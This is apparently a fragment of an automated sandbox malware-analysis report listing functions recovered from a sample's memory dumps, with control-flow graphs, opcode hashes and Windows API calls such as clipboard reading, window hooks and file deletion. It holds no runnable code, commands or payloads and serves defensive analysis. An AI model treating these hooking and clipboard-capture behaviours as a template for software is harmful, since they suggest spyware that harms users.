                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0123F80B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_1230000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                • Opcode ID: c5d4d743bb9f60e92d3f75a1416982991a16ecdc2323c42a8c544015ff080340
                                                                                                                                • Instruction ID: 9dabdeb991bbca2542d9b2fa7b4b09e6e57994dbecf71e27307655d77a961be0
                                                                                                                                • Opcode Fuzzy Hash: c5d4d743bb9f60e92d3f75a1416982991a16ecdc2323c42a8c544015ff080340
                                                                                                                                • Instruction Fuzzy Hash: BB5135B0D102298FDB18CFA9D985B9DBBF1BF88310F14811AE915BB350D7749844CF96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C44A4D Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1262 6c44a4d-6c44a56 1263 6c44a5d-6c44abe 1262->1263 1264 6c44a58-6c44a5c 1262->1264 1265 6c44ac0-6c44ac6 1263->1265 1266 6c44ac9-6c44ad0 1263->1266 1264->1263 1265->1266 1267 6c44ad2-6c44ad8 1266->1267 1268 6c44adb-6c44b13 1266->1268 1267->1268 1269 6c44b1b-6c44b7a CreateWindowExW 1268->1269 1270 6c44b83-6c44bbb 1269->1270 1271 6c44b7c-6c44b82 1269->1271 1275 6c44bbd-6c44bc0 1270->1275 1276 6c44bc8 1270->1276 1271->1270 1275->1276 1277 6c44bc9 1276->1277 1277->1277
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C44B6A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 716092398-0
                                                                                                                                • Opcode ID: ce3ff035f222831388b3b8670519ee89a59e1602f093aa4c6992076947a8a63c
                                                                                                                                • Instruction ID: bd6a21eb55116d024e33a59b388ebe1c2170aae20f1cca6e87cdbcb0765a8f28
                                                                                                                                • Opcode Fuzzy Hash: ce3ff035f222831388b3b8670519ee89a59e1602f093aa4c6992076947a8a63c
                                                                                                                                • Instruction Fuzzy Hash: D751BDB1D006499FDB14DF9AC884ADEBBF5FF48310F24822AE819AB210D7749945CF90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C44A58 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1278 6c44a58-6c44abe 1280 6c44ac0-6c44ac6 1278->1280 1281 6c44ac9-6c44ad0 1278->1281 1280->1281 1282 6c44ad2-6c44ad8 1281->1282 1283 6c44adb-6c44b7a CreateWindowExW 1281->1283 1282->1283 1285 6c44b83-6c44bbb 1283->1285 1286 6c44b7c-6c44b82 1283->1286 1290 6c44bbd-6c44bc0 1285->1290 1291 6c44bc8 1285->1291 1286->1285 1290->1291 1292 6c44bc9 1291->1292 1292->1292
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C44B6A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 716092398-0
                                                                                                                                • Opcode ID: 7d4cf337ef2ead5a13d108236888561fce5448fe068a186b90f7094bb43d0fe8
                                                                                                                                • Instruction ID: bec5399656a06d3564992df20a4a11feb45fe48ccf8b3e22643cfecea1cd8aa1
                                                                                                                                • Opcode Fuzzy Hash: 7d4cf337ef2ead5a13d108236888561fce5448fe068a186b90f7094bb43d0fe8
                                                                                                                                • Instruction Fuzzy Hash: 0141BDB1D003499FDB14CF9AC884ADEBBF5FF48310F24822AE819AB250D7749985CF90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 012375E5 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1293 12375e5-12375ee 1294 12375f0-12375f4 1293->1294 1295 12375f5-1237647 1293->1295 1294->1295 1296 123769b-12376e7 LoadLibraryA 1295->1296 1297 1237649-123766e 1295->1297 1300 12376f0-1237721 1296->1300 1301 12376e9-12376ef 1296->1301 1297->1296 1302 1237670-1237672 1297->1302 1307 1237723-1237727 1300->1307 1308 1237731 1300->1308 1301->1300 1304 1237695-1237698 1302->1304 1305 1237674-123767e 1302->1305 1304->1296 1309 1237682-1237691 1305->1309 1310 1237680 1305->1310 1307->1308 1311 1237729 1307->1311 1313 1237732 1308->1313 1309->1309 1312 1237693 1309->1312 1310->1309 1311->1308 1312->1304 1313->1313
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNELBASE(?), ref: 012376D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_1230000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                • Opcode ID: 4f96fc5ffb0f9c54c75083757c778bcadc3031e8ec920b7a72daa4960523ec12
                                                                                                                                • Instruction ID: 67c8738df5a884e5abcf55fb9bbcd47e378f8741a7796cd890757566f0752acc
                                                                                                                                • Opcode Fuzzy Hash: 4f96fc5ffb0f9c54c75083757c778bcadc3031e8ec920b7a72daa4960523ec12
                                                                                                                                • Instruction Fuzzy Hash: DD4155B0D10659DFDF14CFA9C88478EBBF1EB88314F108129E905AB384D7B49886CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C4763C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1335 6c4763c-6c48c54 1339 6c48d04-6c48d24 call 6c42350 1335->1339 1340 6c48c5a-6c48c5f 1335->1340 1347 6c48d27-6c48d34 1339->1347 1342 6c48c61-6c48c98 1340->1342 1343 6c48cb2-6c48cea CallWindowProcW 1340->1343 1349 6c48ca1-6c48cb0 1342->1349 1350 6c48c9a-6c48ca0 1342->1350 1345 6c48cf3-6c48d02 1343->1345 1346 6c48cec-6c48cf2 1343->1346 1345->1347 1346->1345 1349->1347 1350->1349
                                                                                                                                APIs
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06C48CD9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallProcWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                • Opcode ID: e082e6eccf5e4d44349a5d318c53f5d9b44b73207f9ad98cdaa4f8935617eb4d
                                                                                                                                • Instruction ID: 774533f6e7ac2c7ba1bca3b705288750a515981c97451304013ceb587c60c0e8
                                                                                                                                • Opcode Fuzzy Hash: e082e6eccf5e4d44349a5d318c53f5d9b44b73207f9ad98cdaa4f8935617eb4d
                                                                                                                                • Instruction Fuzzy Hash: DC416CB4A01309CFCB50DF9AC488AAABBF5FF88314F248549E559A7321D734E941CFA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 01234954 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1314 1234954-1237647 1317 123769b-12376e7 LoadLibraryA 1314->1317 1318 1237649-123766e 1314->1318 1321 12376f0-1237721 1317->1321 1322 12376e9-12376ef 1317->1322 1318->1317 1323 1237670-1237672 1318->1323 1328 1237723-1237727 1321->1328 1329 1237731 1321->1329 1322->1321 1325 1237695-1237698 1323->1325 1326 1237674-123767e 1323->1326 1325->1317 1330 1237682-1237691 1326->1330 1331 1237680 1326->1331 1328->1329 1332 1237729 1328->1332 1334 1237732 1329->1334 1330->1330 1333 1237693 1330->1333 1331->1330 1332->1329 1333->1325 1334->1334
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNELBASE(?), ref: 012376D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_1230000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                • Opcode ID: aba35ade4cfb2e55ebbca74255fcf91bab4b722c97444f5dacb2077a9512f5af
                                                                                                                                • Instruction ID: 666066f5878cf6fc96e739e3fc0c130591e6e0d17fdcd74ac65553755a5ed67b
                                                                                                                                • Opcode Fuzzy Hash: aba35ade4cfb2e55ebbca74255fcf91bab4b722c97444f5dacb2077a9512f5af
                                                                                                                                • Instruction Fuzzy Hash: 4E4156B0D106598FDF14CFADC88479EBBF1EB88314F148129E815AB384D7B49845CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0698073C Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1974 698073c-69807e0 OleGetClipboard 1976 69807e9-6980837 1974->1976 1977 69807e2-69807e8 1974->1977 1982 6980839-698083d 1976->1982 1983 6980847 1976->1983 1977->1976 1982->1983 1984 698083f 1982->1984 1985 6980848 1983->1985 1984->1983 1985->1985
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 220874293-0
                                                                                                                                • Opcode ID: 8dc090a49ed3e05f411968a1477755e9eb939856ed54fc9f74f1116e46489ef8
                                                                                                                                • Instruction ID: 15d25e56242887dbde544b0bd67040aa08611d9bf4c9d9790ab59c27c8b6a3b7
                                                                                                                                • Opcode Fuzzy Hash: 8dc090a49ed3e05f411968a1477755e9eb939856ed54fc9f74f1116e46489ef8
                                                                                                                                • Instruction Fuzzy Hash: FA31E1B0E01258DFDB50DF99C984BDEBFF5AB48314F248019E008BB694D7759989CBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06980748 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1986 6980748-69807e0 OleGetClipboard 1988 69807e9-6980837 1986->1988 1989 69807e2-69807e8 1986->1989 1994 6980839-698083d 1988->1994 1995 6980847 1988->1995 1989->1988 1994->1995 1996 698083f 1994->1996 1997 6980848 1995->1997 1996->1995 1997->1997
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 220874293-0
                                                                                                                                • Opcode ID: 899dbd7abcaba2b37fc0396e68ab7b0f086b3179abb3293b44b562df09731fed
                                                                                                                                • Instruction ID: b8605fbb270f5a42a530eed8519e6fb446bf86eafaf196e2efd040c2d3146b65
                                                                                                                                • Opcode Fuzzy Hash: 899dbd7abcaba2b37fc0396e68ab7b0f086b3179abb3293b44b562df09731fed
                                                                                                                                • Instruction Fuzzy Hash: F131E1B0D01248DFDB50DF99C984BCEBBF5AF48314F248019E404BB794D775A989CBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C47C78 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06C47D07
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 0e1929928d33ed204f686eba0e8f01b5e61b7a1fdd281ecef2501f6304b0e022
                                                                                                                                • Instruction ID: 9852ddc2af1c1a07d3e7f934d97793a2e26bdaed52e4bfab589d657a3812ac27
                                                                                                                                • Opcode Fuzzy Hash: 0e1929928d33ed204f686eba0e8f01b5e61b7a1fdd281ecef2501f6304b0e022
                                                                                                                                • Instruction Fuzzy Hash: 4521E9B5D002499FDB10CF9AD984ADEBFF8FB48324F14845AE955A3310D374A944CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C42298 Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1998 6c42298-6c422a2 2000 6c422a4 1998->2000 2001 6c422a9-6c451ea 1998->2001 2000->2001 2004 6c451f2-6c4521d DeleteFileW 2001->2004 2005 6c451ec-6c451ef 2001->2005 2006 6c45226-6c4524e 2004->2006 2007 6c4521f-6c45225 2004->2007 2005->2004 2007->2006
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06C45210
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 5db3359da87c026512ba373c08522d7cfbbe7ca53f3fb949b0ce60aac688aa51
                                                                                                                                • Instruction ID: bfb93f2b88117cd3d196c6fb1b84676605fab6ef292bd663aebee24680caee23
                                                                                                                                • Opcode Fuzzy Hash: 5db3359da87c026512ba373c08522d7cfbbe7ca53f3fb949b0ce60aac688aa51
                                                                                                                                • Instruction Fuzzy Hash: 802159B2C006598BCB10DF9AC4447DEBBF4EF48324F14816AE815A7740D738AA44CFE5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C47C80 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06C47D07
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 7b41d535bf092f9559db2fa26a790140f0da836dbc3c49d53e4d3c6496e6f249
                                                                                                                                • Instruction ID: 52111d2ff1618ebc6671effeca630e57a330824f1a56ec1e3d63600c3323015c
                                                                                                                                • Opcode Fuzzy Hash: 7b41d535bf092f9559db2fa26a790140f0da836dbc3c49d53e4d3c6496e6f249
                                                                                                                                • Instruction Fuzzy Hash: 1A21E4B5D002499FDB10CF9AD984ADEBFF8EB48324F14841AE914A3310D378A944CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06983050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069830D3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HookWindows
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2559412058-0
                                                                                                                                • Opcode ID: 2f2c56ab2ca091bc292fbd8a307d6d39868ed06b66c3810b1004c035293e07bf
                                                                                                                                • Instruction ID: 2268c47d6bb1be758bef560d9d6bbed11f237529b0d4056842c0c28e2f51cfe8
                                                                                                                                • Opcode Fuzzy Hash: 2f2c56ab2ca091bc292fbd8a307d6d39868ed06b66c3810b1004c035293e07bf
                                                                                                                                • Instruction Fuzzy Hash: 2A213875D002099FCB50DF9AD844BEEFBF5EF88320F10842AE459A7650CB74A944CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C4186F Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06C41906
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: ff5bbb6f8aae8c94e01d733aecd662ad4e564207999aab8de720aab1d14ce028
                                                                                                                                • Instruction ID: afb7233b60f81bc4cece86c9b9f0c0300abdc1c62409bdb4b76151846a340d04
                                                                                                                                • Opcode Fuzzy Hash: ff5bbb6f8aae8c94e01d733aecd662ad4e564207999aab8de720aab1d14ce028
                                                                                                                                • Instruction Fuzzy Hash: 582189B1C043888FCB11DFAAC80469EBFF4AF8A314F14849ED494A7652D3386545CFA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C422A4 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06C45210
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 8f83c96cf1f721841901a99b7c8f8ac82fab9f688bd8286b320bcf9f16e15cc9
                                                                                                                                • Instruction ID: 1a8f6e0846686b926be062fe6f4430c1f2e8438a416948eae8a637bb011f1491
                                                                                                                                • Opcode Fuzzy Hash: 8f83c96cf1f721841901a99b7c8f8ac82fab9f688bd8286b320bcf9f16e15cc9
                                                                                                                                • Instruction Fuzzy Hash: BE2115B6C006599BCB10DF9AC4447AEFBF4FB48320F54816AE818B7640D778AA44CFE5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C45199 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06C45210
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 73c68933a0edb89b1a6350a8fc60fceaeeba8d77fbf48fcb86a63e1e1414d565
                                                                                                                                • Instruction ID: cee562c9382e21ce0ab112f1580c88b0946fdf0e10c3b8eede17a93a3fa40beb
                                                                                                                                • Opcode Fuzzy Hash: 73c68933a0edb89b1a6350a8fc60fceaeeba8d77fbf48fcb86a63e1e1414d565
                                                                                                                                • Instruction Fuzzy Hash: 892127B2C006599BCB10DF9AD4447DEFBB4FB48324F14812AE858B7640D738AA44CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06983058 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069830D3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HookWindows
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2559412058-0
                                                                                                                                • Opcode ID: 14b3549c155f1eb841fdb848af257d07cc9c8db9be3a870c960eefed2f82d100
                                                                                                                                • Instruction ID: 28e65cd6aad440aaa82927520e59b0d1eb70991c7667e2e0197c7857189084f2
                                                                                                                                • Opcode Fuzzy Hash: 14b3549c155f1eb841fdb848af257d07cc9c8db9be3a870c960eefed2f82d100
                                                                                                                                • Instruction Fuzzy Hash: 55212775D002099FCB50DF9AD844BEEFBF5EB88320F10841AD419A7650CB78A944CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0698DA08 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,0698D9E9,00000800), ref: 0698DA7A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                • Opcode ID: 83338efb555ffb4740ac2833287a545ebc6dbcdea4a9925a620dbcf661531446
                                                                                                                                • Instruction ID: 18be0909581ef22cd1999866ae7c32fbd7db05dff65da6a89e2a100ae5847cf7
                                                                                                                                • Opcode Fuzzy Hash: 83338efb555ffb4740ac2833287a545ebc6dbcdea4a9925a620dbcf661531446
                                                                                                                                • Instruction Fuzzy Hash: C12124B6C002499FCB10DF9AC844ADEBBF8AF48324F24841AE469A7640C375A545CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0698CA10 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,0698D9E9,00000800), ref: 0698DA7A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                • Opcode ID: 1767a274dc2df83627db77710706b7e551e66be9e37f3888087d388a3628e37f
                                                                                                                                • Instruction ID: f34aead24f79595dbb1176e9b1d857a3078754af6609d87530c89e5f6c910f19
                                                                                                                                • Opcode Fuzzy Hash: 1767a274dc2df83627db77710706b7e551e66be9e37f3888087d388a3628e37f
                                                                                                                                • Instruction Fuzzy Hash: 261106B6D043499FCB10DF9AC484ADEBBF8EF48320F20841AD45AA7640C375A545CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C418A0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06C41906
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: ba114e315513c3f27b82a26ce93306ad8cb027c1a8e480abdba4c76f1cacc6c9
                                                                                                                                • Instruction ID: 1cd1f208372787588c94fa9206eff8d289bbaa2cc9acbc6df6642ba05282b088
                                                                                                                                • Opcode Fuzzy Hash: ba114e315513c3f27b82a26ce93306ad8cb027c1a8e480abdba4c76f1cacc6c9
                                                                                                                                • Instruction Fuzzy Hash: 1E1113B5C002498FCB10DF9AC444ADEFBF4EF48324F14841AD459B7600D379A585CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 06C4C001 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06C4BFA5), ref: 06C4C02F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                • Opcode ID: 94e04d0e5f3eaa21aa49d24ecd223a03cd9c5963a9ab20b9d7827045cd1e5a33
                                                                                                                                • Instruction ID: 446570e9ea05b5b0c3b650f00e9bc8aa303988442ddb1f6b9dad46cca799fe71
                                                                                                                                • Opcode Fuzzy Hash: 94e04d0e5f3eaa21aa49d24ecd223a03cd9c5963a9ab20b9d7827045cd1e5a33
                                                                                                                                • Instruction Fuzzy Hash: E6F044B59002488FCB20DF89D4887DEBBF0AF88324F20841AD128A3660C379A484CFA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%